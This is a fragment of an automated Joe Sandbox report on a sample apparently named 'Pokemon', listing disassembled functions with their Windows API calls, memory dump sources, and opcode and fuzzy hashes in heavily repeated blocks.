                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2762a9b83882e2bc31e232c9241524fa039f2c7fb8081e86957cecd222f72e24
                                                                                                                                                                                                                                                                                      • Instruction ID: ea34151b9a316443dfb5727b281404da8cac04890980d4011b8c346635f7d1a7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2762a9b83882e2bc31e232c9241524fa039f2c7fb8081e86957cecd222f72e24
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAF08C31600206AFE724EFB9D419FA6FBE9AF45760F004429F81AC7661DB70AC10CB90
                                                                                                                                                                                                                                                                                      Function 000AFFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 252777609-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                      • Instruction ID: 2a072be98c40a140e9485053fc034a7c212460b1c4d25c412114cc338b0b860a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5731D370A10109DFC758EF58D494AAAFBB6FB59300F6486A5E409CB252DB32EDC1CBD0
                                                                                                                                                                                                                                                                                      Function 0009CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0009CEEE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 67026160f06be8cf26895ee06447f27b3c701b91434212b7f408c94ca3aff386
                                                                                                                                                                                                                                                                                      • Instruction ID: c248a3c7fabb0830454785a2b5f7486ab3f16d8b78cc08ad2d6c7e740aebad65
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67026160f06be8cf26895ee06447f27b3c701b91434212b7f408c94ca3aff386
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A329975E042459FEF24CF54C884EBEBBF5EF45310F188069E816AB292C774AE81DB90
                                                                                                                                                                                                                                                                                      Function 00117AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d8bc4900402d32d3513734aaa4d467833a2f43b6593573bf793d184d7e61e886
                                                                                                                                                                                                                                                                                      • Instruction ID: f0148d03453dac1a1eaa8afc903ce64a4435ea98a30f0fd206bfd618175f1de8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8bc4900402d32d3513734aaa4d467833a2f43b6593573bf793d184d7e61e886
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBD15E74A05209EFCF18EF94D4819EDBBB5FF58310F144169E515AB392EB31AD81CB90
                                                                                                                                                                                                                                                                                      Function 000BF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 4e2be3b20e355533d824541d506f781ac4a7645e96895f1f05616574439a73fe
                                                                                                                                                                                                                                                                                      • Instruction ID: 4128acc2fcfd9300dd60c36a2a20170ab4beb8bf53be37f3025fd6a5e612c75b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e2be3b20e355533d824541d506f781ac4a7645e96895f1f05616574439a73fe
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6351A175A00209AFDB10DF68CC45AF97BE1EF85364F19C5B8E8189B392D771AD42CB90
                                                                                                                                                                                                                                                                                      Function 000FFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 000FFCCE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 265087299e8f646484fb6423f3a216d476396666ddb0aa4ad366b564d8f55785
                                                                                                                                                                                                                                                                                      • Instruction ID: a169f5e81b149aa5fe341d145c3ca37fc39a446b23baa755430c2069a358ab6f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 265087299e8f646484fb6423f3a216d476396666ddb0aa4ad366b564d8f55785
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41B3B250020EAFCB11AF68C8819FEB7F9EF44314B11853AE61697691EB70DE05DB50
                                                                                                                                                                                                                                                                                      Function 00096679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009664A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0009665C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009663E: FreeLibrary.KERNEL32(00000000,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009666E
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000962FA,?,00000001,?,?,00000000), ref: 000966AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00096607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096610
                                                                                                                                                                                                                                                                                        • Part of subcall function 00096607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00096622
                                                                                                                                                                                                                                                                                        • Part of subcall function 00096607: FreeLibrary.KERNEL32(00000000,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096635
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8ff168f6b51bababe40744c87753a4843ee2cb61e72980926954d45bb03981f7
                                                                                                                                                                                                                                                                                      • Instruction ID: 527208faf0202cfa5968c956aa280d98c7b4d3e8958ba55db14b63e5ea44071a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ff168f6b51bababe40744c87753a4843ee2cb61e72980926954d45bb03981f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D11E376600305AACF25AB60CC02BED7BA59F50711F20442EF492A71C3EFB3DA15BB60
                                                                                                                                                                                                                                                                                      Function 000C8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b6d650c489df16ee37fb80bf86974d40d0e59f6382be2030b83676d0c74acf36
                                                                                                                                                                                                                                                                                      • Instruction ID: 17f5c84d4b52a29c7fc67a679a4fd4590d4674699451c806f8a56c2812b9b721
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6d650c489df16ee37fb80bf86974d40d0e59f6382be2030b83676d0c74acf36
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2115A7190420AAFCF05DF58E940EDE7BF4EF48300F108069F808AB311DA31EA11CB68
                                                                                                                                                                                                                                                                                      Function 000C5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000C5031
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C53DF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                      • Instruction ID: 10d36942a45a80a8e12d4a0147193d4eb4d2a9aef23fd1e73430a2283757acfc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A01D6762007456BE3318F69DC81E9EFBE9EB85370F65062DE584832C1EA70A9458764
                                                                                                                                                                                                                                                                                      Function 000BE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                      • Instruction ID: e62173e7fd54179dc8fd43fa7c0eecf0e9aeaed65cb4f73edd01bdb91a6fa55b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02F0F93250061096D6713B26DC01BEE37988F42330F14472AF425931D3EB70E80586D6
                                                                                                                                                                                                                                                                                      Function 0009B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0b39babc242ba401b22e8da1cab67e9cc6676bc9e3ac47c034de87991702de28
                                                                                                                                                                                                                                                                                      • Instruction ID: d096a2b88e9765e153661dab030d0634067c7bbeaee37c031e077a621acade3a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b39babc242ba401b22e8da1cab67e9cc6676bc9e3ac47c034de87991702de28
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87F0C8B36017046ED7149F29DC06BE7BB98EB44760F50C52AFA19CB2D2DB31E5108BA0
                                                                                                                                                                                                                                                                                      Function 0010F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0010F987
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ecc5a9861a5be6549ce8916d2fbabe041f9b60fd97805f738f528d22945ea57e
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f53641fe8bd4dca53539c0fef57f7b60853c46a66bd75e5bf32bea107b540fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecc5a9861a5be6549ce8916d2fbabe041f9b60fd97805f738f528d22945ea57e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2F03C72600204BFCB15EBA5DC46DDF77B8EF59720F004455F505AB262DA74AE41C761
                                                                                                                                                                                                                                                                                      Function 000C4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000C5031
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2060febb97ef45c941a4a0df436ec27e4a5084e0bebb4b561518e035535d0369
                                                                                                                                                                                                                                                                                      • Instruction ID: 8b47966ddf4c98cfb34b492af33e3cda0c7464ed145a42daeca0afbb15a4c1ea
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2060febb97ef45c941a4a0df436ec27e4a5084e0bebb4b561518e035535d0369
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11F0B43E511E20669B711B26DC05F9E3788BF417A2F354019FC04E71A1DB70F88186E0
                                                                                                                                                                                                                                                                                      Function 000C3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
